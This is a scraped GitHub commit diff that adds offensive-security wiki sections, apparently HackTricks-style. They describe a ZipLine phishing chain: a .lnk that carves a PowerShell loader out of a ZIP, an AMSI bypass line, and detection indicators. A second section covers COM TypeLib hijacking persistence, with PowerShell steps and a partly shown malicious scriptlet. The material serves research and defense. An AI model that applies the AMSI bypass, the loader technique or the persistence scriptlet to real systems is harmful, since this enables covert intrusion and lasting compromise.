You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Highly effective campaigns deliver a ZIP that contains two legitimate decoy documents (PDF/DOCX) and a malicious .lnk. The trick is that the actual PowerShell loader is stored inside the ZIP’s raw bytes after a unique marker, and the .lnk carves and runs it fully in memory.
173
+
174
+
Typical flow implemented by the .lnk PowerShell one-liner:
175
+
176
+
1) Locate the original ZIP in common paths: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, and the parent of the current working directory.
177
+
2) Read the ZIP bytes and find a hardcoded marker (e.g., xFIQCV). Everything after the marker is the embedded PowerShell payload.
178
+
3) Copy the ZIP to %ProgramData%, extract there, and open the decoy .docx to appear legitimate.
179
+
4) Bypass AMSI for the current process: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
180
+
5) Deobfuscate the next stage (e.g., remove all # characters) and execute it in memory.
181
+
182
+
Example PowerShell skeleton to carve and run the embedded stage:
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
203
+
- The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimize disk artifacts.
204
+
205
+
Persistence used in the same chain
206
+
- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
- ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data.
214
+
- .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document.
215
+
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
216
+
- Long-running business threads ending with links hosted under trusted PaaS domains.
217
+
218
+
## References
171
219
220
+
- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
221
+
- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.
80
80
81
+
---
82
+
83
+
## COM TypeLib Hijacking (script: moniker persistence)
84
+
85
+
Type Libraries (TypeLib) define COM interfaces and are loaded via `LoadTypeLib()`. When a COM server is instantiated, the OS may also load the associated TypeLib by consulting registry keys under `HKCR\TypeLib\{LIBID}`. If the TypeLib path is replaced with a **moniker**, e.g. `script:C:\...\evil.sct`, Windows will execute the scriptlet when the TypeLib is resolved – yielding a stealthy persistence that triggers when common components are touched.
86
+
87
+
This has been observed against the Microsoft Web Browser control (frequently loaded by Internet Explorer, apps embedding WebBrowser, and even `explorer.exe`).
88
+
89
+
### Steps (PowerShell)
90
+
91
+
1) Identify the TypeLib (LIBID) used by a high-frequency CLSID. Example CLSID often abused by malware chains: `{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}` (Microsoft Web Browser).
var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
120
+
sh.Run(cmd, 0, false);
121
+
} catch(e) {}
122
+
]]>
123
+
</script>
124
+
</scriptlet>
125
+
```
126
+
127
+
4) Triggering – opening IE, an application that embeds the WebBrowser control, or even routine Explorer activity will load the TypeLib and execute the scriptlet, re-arming your chain on logon/reboot.
- You can apply the same logic to other high-frequency COM components; always resolve the real `LIBID` from `HKCR\CLSID\{CLSID}\TypeLib` first.
139
+
- On 64-bit systems you may also populate the `win64` subkey for 64-bit consumers.
140
+
141
+
## References
142
+
143
+
-[Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
144
+
-[Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
0 commit comments